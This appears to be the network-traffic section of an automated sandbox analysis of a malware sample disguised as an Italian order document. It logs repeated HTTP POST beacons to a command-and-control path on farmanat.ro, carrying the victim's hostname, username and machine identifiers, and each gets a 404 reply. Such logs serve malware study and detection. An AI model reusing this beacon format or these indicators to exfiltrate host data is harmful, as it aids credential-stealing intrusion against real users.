Nov 25, 2021 10:54:24.687768936 CET	7342	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:24.721345901 CET	7342	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:24.774898052 CET	7343	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
744	192.168.11.20	50592	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:25.208925962 CET	7343	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:25.242980957 CET	7344	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:25.299103975 CET	7344	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
745	192.168.11.20	50593	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:25.717248917 CET	7345	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:25.750817060 CET	7345	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:25.801876068 CET	7345	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
746	192.168.11.20	50594	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:26.227736950 CET	7346	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:26.261358023 CET	7346	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:26.314987898 CET	7347	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
747	192.168.11.20	50595	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:26.656063080 CET	7347	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:26.690289021 CET	7348	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:26.741338968 CET	7348	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
748	192.168.11.20	50596	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:27.183294058 CET	7349	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:27.217629910 CET	7349	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:27.268580914 CET	7349	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
749	192.168.11.20	50597	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:27.683854103 CET	7350	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:27.717432022 CET	7350	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:27.766393900 CET	7351	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.11.20	49912	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:48.224669933 CET	6419	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:48.259001017 CET	6420	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:48.313889027 CET	6420	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
750	192.168.11.20	50598	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:28.164932013 CET	7351	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:28.199127913 CET	7352	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:28.250722885 CET	7352	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
751	192.168.11.20	50599	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:28.673309088 CET	7353	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:28.706809998 CET	7353	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:28.756836891 CET	7353	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
752	192.168.11.20	50600	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:29.175600052 CET	7354	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:29.209117889 CET	7354	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:29.258585930 CET	7355	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
753	192.168.11.20	50601	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:29.632936001 CET	7355	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:29.666925907 CET	7356	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:29.716418028 CET	7356	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
754	192.168.11.20	50602	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:30.061319113 CET	7357	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:30.094902992 CET	7357	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:30.147492886 CET	7357	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
755	192.168.11.20	50603	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:30.580873013 CET	7358	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:30.615057945 CET	7358	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:30.665218115 CET	7359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
756	192.168.11.20	50604	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:31.098891973 CET	7359	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:31.133148909 CET	7360	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:31.184423923 CET	7360	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
757	192.168.11.20	50605	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:31.612838030 CET	7361	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:31.646614075 CET	7361	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:31.704845905 CET	7361	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
758	192.168.11.20	50606	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:32.118997097 CET	7362	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:32.153240919 CET	7362	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:32.204696894 CET	7363	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
759	192.168.11.20	50607	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:32.556276083 CET	7363	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:32.589571953 CET	7364	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:32.638225079 CET	7364	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.11.20	49913	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:48.828094006 CET	6421	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:48.862154007 CET	6421	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:48.914376974 CET	6421	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
760	192.168.11.20	50608	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:33.057682991 CET	7365	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:33.091890097 CET	7365	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:33.142641068 CET	7365	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
761	192.168.11.20	50609	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:33.558686972 CET	7366	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:33.592837095 CET	7366	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
